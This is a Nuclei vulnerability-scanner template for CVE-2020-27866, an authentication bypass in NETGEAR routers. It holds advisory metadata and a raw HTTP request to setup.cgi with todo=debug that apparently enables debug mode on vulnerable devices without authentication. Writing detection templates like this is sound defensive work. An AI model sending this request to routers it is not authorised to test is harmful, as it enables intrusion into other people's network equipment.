nuclei-templates/cves/2020/CVE-2020-27866.yaml

40 lines
1.3 KiB
YAML

id: CVE-2020-27866
info:
name: NETGEAR Authentication Bypass vulnerability
author: gy741
severity: high
description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020,
Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability.
reference:
- https://wzt.ac.cn/2021/01/13/AC2400_vuln/
- https://www.zerodayinitiative.com/advisories/ZDI-20-1451/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27866
- https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-27866
cwe-id: CWE-288
tags: cve,cve2020,netgear,auth-bypass
requests:
- raw:
- |
GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'Debug Enable!'
part: body